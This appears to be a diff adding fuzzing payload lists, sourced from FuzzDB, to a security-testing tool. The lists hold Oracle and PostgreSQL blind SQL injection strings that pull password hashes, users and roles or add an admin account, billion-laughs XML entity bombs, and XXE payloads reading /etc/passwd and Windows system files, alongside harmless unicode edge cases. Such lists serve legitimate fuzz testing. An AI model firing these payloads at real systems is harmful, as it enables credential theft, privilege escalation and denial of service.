+# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection/payloads-sql-blind)
+# Origin source: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/
+
+’ or ‘1’=’1
+' or '1'='1
+'||utl_http.request('httP://192.168.1.1/')||'
+' || myappadmin.adduser('admin', 'newpass') || '
+' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
+' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
+
--- a/fuzzer/payloads/lists/sql-injection/postgre-blind.txt
+++ b/fuzzer/payloads/lists/sql-injection/postgre-blind.txt
@@ -0,0 +1,12 @@
+# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/sql-injection/detect/GenericBlind.txt)
+
+pg_sleep(200000)--
+1 or pg_sleep(200000)--
+" or pg_sleep(200000)--
+' or pg_sleep(200000)--
+1) or pg_sleep(200000)--
+") or pg_sleep(200000)--
+') or pg_sleep(200000)--
+1)) or pg_sleep(200000)--
+")) or pg_sleep(200000)--
+')) or pg_sleep(200000)--
--- a/fuzzer/payloads/lists/unicode/corrupted.txt
+++ b/fuzzer/payloads/lists/unicode/corrupted.txt
@@ -0,0 +1,6 @@
+# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
+Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣
+̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰
+̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟
+̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕
+Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
--- a/fuzzer/payloads/lists/unicode/emoji.txt
+++ b/fuzzer/payloads/lists/unicode/emoji.txt
@@ -0,0 +1,9 @@
+# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
+😍
+👩🏽
+👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 
+🐵 🙈 🙉 🙊
+❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
+✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
+🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
+0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
--- a/fuzzer/payloads/lists/unicode/imessage.txt
+++ b/fuzzer/payloads/lists/unicode/imessage.txt
@@ -0,0 +1,2 @@
+# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/control-chars/imessage.txt)
+Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
--- a/fuzzer/payloads/lists/unicode/japanese-emoticon.txt
+++ b/fuzzer/payloads/lists/unicode/japanese-emoticon.txt
@@ -0,0 +1,12 @@
+# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
+ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ 
+(｡◕ ∀ ◕｡)
+｀ｨ(´∀｀∩
+__ﾛ(,_,*)
+・(￣∀￣)・:*:
+ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ
+,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’
+(╯°□°）╯︵ ┻━┻)  
+(ﾉಥ益ಥ）ﾉ ┻━┻
+┬─┬ノ( º _ ºノ)
+( ͡° ͜ʖ ͡°)
--- a/fuzzer/payloads/lists/unicode/naughty-unicode.txt
+++ b/fuzzer/payloads/lists/unicode/naughty-unicode.txt
@@ -0,0 +1,21 @@
+# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
+Ω≈ç√∫˜µ≤≥÷
+åß∂ƒ©˙∆˚¬…æ
+œ∑´®†¥¨ˆøπ“‘
+¡™£¢∞§¶•ªº–≠
+¸˛Ç◊ı˜Â¯˘¿
+ÅÍÎÏ˝ÓÔÒÚÆ☃
+Œ„´‰ˇÁ¨ˆØ∏”’
+`⁄€‹›ﬁﬂ‡°·‚—±
+⅛⅜⅝⅞
+ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя
+٠١٢٣٤٥٦٧٨٩
+
+
+
+
+
+⁰⁴⁵
+₀₁₂
+⁰⁴⁵₀₁₂
+ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็
--- a/fuzzer/payloads/lists/unicode/regional-indicators.txt
+++ b/fuzzer/payloads/lists/unicode/regional-indicators.txt
@@ -0,0 +1,4 @@
+# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
+🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸                                                                                          
+🇺🇸🇷🇺🇸🇦🇫🇦🇲
+🇺🇸🇷🇺🇸🇦
--- a/fuzzer/payloads/lists/unicode/right-to-left.txt
+++ b/fuzzer/payloads/lists/unicode/right-to-left.txt
@@ -0,0 +1,6 @@
+# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
+ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.
+בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ
+הָיְתָהtestالصفحات التّحول
+﷽
+ﷺ
--- a/fuzzer/payloads/lists/unicode/two-byte-chars.txt
+++ b/fuzzer/payloads/lists/unicode/two-byte-chars.txt
@@ -0,0 +1,10 @@
+# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
+田中さんにあげて下さい
+パーティーへ行かないか
+和製漢語
+部落格
+사회과학원 어학연구소
+찦차를 타고 온 펲시맨과 쑛다리 똠방각하
+社會科學院語學研究所
+울란바토르
+𠜎𠜱𠝹𠱓𠱸𠲖𠳏
--- a/fuzzer/payloads/lists/unicode/upsidedown.txt
+++ b/fuzzer/payloads/lists/unicode/upsidedown.txt
@@ -0,0 +1,3 @@
+# Source: https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/unicode (origin: https://github.com/minimaxir/big-list-of-naughty-strings)
+˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥
+00˙Ɩ$-
--- a/fuzzer/payloads/lists/xml/xml-generic.txt
+++ b/fuzzer/payloads/lists/xml/xml-generic.txt
@@ -0,0 +1,9 @@
+# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
+
+# General timeouts
+count(/child::node())
+<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
+
+# Billion laughs attack
+<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>
+"<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)><!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz>"
--- a/fuzzer/payloads/lists/xml/xml-non-existing-file-paths.txt
+++ b/fuzzer/payloads/lists/xml/xml-non-existing-file-paths.txt
@@ -0,0 +1,16 @@
+# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
+
+"<xml SRC=""c:\boot.ini"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\unknown\unknown"">]><foo>&xxe;</foo>"
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:\unknown\unknown">]><foo>&xee;</foo>o>
+<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\unknown\unknown">
+
+"<xml SRC=""/unknown/unknown"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////unknown/unknown"">]><foo>&xxe;</foo>"
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///unknown/unknown">]><foo>&xee;</foo>
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///unknown/unknown">
+
+"<xml SRC=""/unknown/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////unknown/"">]><foo>&xxe;</foo>"
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///unknown/">]><foo>&xee;</foo>
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///unknown/">
--- a/fuzzer/payloads/lists/xml/xml-unix-existing-file-paths.txt
+++ b/fuzzer/payloads/lists/xml/xml-unix-existing-file-paths.txt
@@ -0,0 +1,23 @@
+# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
+
+"<xml SRC=""/apache/logs/access.log"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""/etc/passwd"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""/apache/logs/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""/etc/"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////apache/logs/access.log"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////apache/logs/"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/"">]><foo>&xxe;</foo>"
+
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///apache/logs/access.log">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///apache/logs/">]><foo>&xee;</foo>
+<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/">]><foo>&xee;</foo>
+
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs/access.log">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/passwd">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs/">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc/">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///apache/logs">
+<!DOCTYPE autofillupload [<!ENTITY 9eTVC SYSTEM "file:///etc">
--- a/fuzzer/payloads/lists/xml/xml-windows-existing-file-paths.txt
+++ b/fuzzer/payloads/lists/xml/xml-windows-existing-file-paths.txt
@@ -0,0 +1,35 @@
+# Based on FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xml/xml-attacks.txt)
+
+"<xml SRC=""c:\boot.ini"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""c:\inetpub\wwwroot\index.asp"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""c:\pagefile.sys"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""c:\Windows\system.ini"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""c:\Windows\"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""c:\"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+"<xml SRC=""c:\inetpub\"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
+
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\boot.ini"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\inetpub\wwwroot\index.asp"">]><foo>&xxe;</foo>"
+"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:\pagefile.sys"">]><foo>&xxe;</foo>"
